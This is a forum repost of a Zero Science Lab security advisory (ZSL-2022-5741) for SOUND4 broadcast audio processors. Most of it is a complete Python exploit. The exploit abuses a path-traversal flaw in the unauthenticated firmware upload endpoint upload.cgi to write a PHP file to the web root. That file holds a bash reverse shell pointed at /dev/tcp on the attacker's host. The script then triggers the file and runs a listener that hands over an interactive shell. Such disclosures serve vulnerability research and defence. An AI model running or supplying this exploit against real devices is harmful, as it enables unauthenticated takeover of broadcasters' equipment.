Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!
  • Важно
    Имате проблем со најава или регистрација на it.mk?
    Побарајте го решението на вашиот проблем ТУКА!

SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution (2)

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
909
559
www.zeroscience.mk
Python:
#!/usr/bin/env python
#
#
# SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution
#
#
# Vendor: SOUND4 Ltd.
# Product web page: https://www.sound4.com | https://www.sound4.biz
# Affected version: FM/HD Radio Processing:
#                   Impact/Pulse/First (Version 2: 1.1/2.15)
#                   Impact/Pulse/First (Version 1: 2.1/1.69)
#                   Impact/Pulse Eco 1.16
#                   Voice Processing:
#                   BigVoice4 1.2
#                   BigVoice2 1.30
#                   Web-Audio Streaming:
#                   Stream 1.1/2.4.29
#                   Watermarking:
#                   WM2 (Kantar Media) 1.11
#
# Summary: The SOUND4 IMPACT introduces an innovative process - mono and
# stereo parts of the signal are processed separately to obtain perfect
# consistency in terms of both sound and level. Therefore, in moving
# reception, when the FM receiver switches from stereo to mono and back to
# stereo, the sound variations and changes in level are reduced by over 90%.
# In the SOUND4 IMPACT processing chain, the stereo expander can be used
# substantially without any limitations.
#
# With its advanced functionalities and impressive versatility, SOUND4
# PULSE gives clients the ultimate price - performance ratio, providing
# much more than just a processor. Flexible and powerful, it ensures perfect
# sound quality and full compatibility with radio broadcasting standards
# and can be used simultaneously for FM and HD, DAB, DRM or streaming.
#
# SOUND4 FIRST provides all the most important functionalities you need
# in an FM/HD processor and sets the bar high both in terms of performance
# and affordability. Designed to deliver a sound of uncompromising quality,
# this tool gives you 2-band processing, a digital stereo generator and an
# IMPACT Clipper.
#
# Desc: SOUND4 products suffer from an unauthenticated remote code execution
# vulnerability. An attacker can exploit this vulnerability by abusing the
# firmware upgrade/upload functionality, which contains a path traversal flaw.
# This allows the attacker to arbitrarily write a malicious file to a location
# on the system with www-data permissions, which can be executed to gain unauthorized
# access.
#
# Tested on: Apache/2.4.25 (Unix)
#            OpenSSL/1.0.2k
#            PHP/7.1.1
#            GNU/Linux 5.10.43 (armv7l)
#            GNU/Linux 4.9.228 (armv7l)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5741
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php
#
#
# 26.09.2022
#
#


from time import sleep
import threading#-----
import telnetlib#-----
import requests#------
import socket#--------
import sys#-----------
import re#------------

class VideoKilledTheRadioStar:
    
    def __init__(self):
        self.secretagent = "Dj/Ole"
        self.payload = None
        self.deploy = None
        self.rhost = None
        self.lhost = None
        self.lport = None

    def the_args(self):
        if len(sys.argv) != 4:
            self.the_usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def the_usage(self):
        self.the_wha()
        print("Usage: python {} [targetIP:targetPORT] [listenIP] [listenPORT]".format(sys.argv[0]))
        exit(0)

    def the_wha(self):
        titl = """
         /\______  __
        /-~     ,^~ / __n
       / ,---x /_.-"L/__,\\
      /-".---.\_.-'/!"  \ \\
      0\/0___/   x' /    ) |
      \.______.-'_.{__.-"_.^
       `x____,.-",-~( .-"
          _.-| ,^.-~ "\\
     __.-~_,-|/\/     `i
    / u.-~ .-{\/     .-^--.
    \/   v~ ,-^x.____}--r |
        / /"            | |
      _/_/              !_l_
    o~_//)             (_\\_~o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        """
        print(titl)

    def the_upload(self):
        print("Writing callback file...")
        self.headers = {"Content-Type" : "multipart/form-data; boundary=----TheMenu",
                        "Accept-Language" : "en-US,en;q=0.9",
                        "Accept-Encoding" : "gzip, deflate",
                        "User-Agent" : self.secretagent,
                        "Cache-Control" : "max-age=0",
                        "Connection" : "close",
                        "Accept" : "*/*"}
    
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm b.php'\");"

        self.deploy  = "------TheMenu\r\nContent-Disposition: form-data;"#us
        self.deploy += " name=\"upgfile\"; filename=\"../../../../../../"#Me
        self.deploy += "../var/www/b.php\"\r\nContent-Type: application/"#co
        self.deploy += "octet-stream\r\n\r\n"+self.payload+"\r\n------Th"#..
        self.deploy += "eMenu\r\nContent-Disposition: form-data; name=\""#n
        self.deploy += "submit\"\r\n\r\nDo it\r\n------TheMenu--\r\n"#------
    
        requests.post(self.rhost+"/cgi-bin/upload.cgi", headers=self.headers, data=self.deploy)
        sleep(1) 
        requests.get(self.rhost+"/b.php")

    def the_subp(self):
        konac = threading.Thread(name="ZSL", target=self.the_ear)
        konac.start()
        sleep(1)
        self.the_upload()

    def the_ear(self):
        telnetus = telnetlib.Telnet()
        print("Starting handler on port {}.".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("Hmmm ({msg})".format(msg=p))
                s.close()
                exit(0)
            break

        print("You got shell.")
        telnetus.interact()
        conn.close()

    def main(self):
        self.the_args()
        self.the_subp()

if __name__ == '__main__':
    VideoKilledTheRadioStar().main()


 

Нови мислења

Последни Теми

Статистика

Теми
46.585
Мислења
965.502
Членови
34.956
Огласи
2.660
Најнов член
DragiD
На врв Дно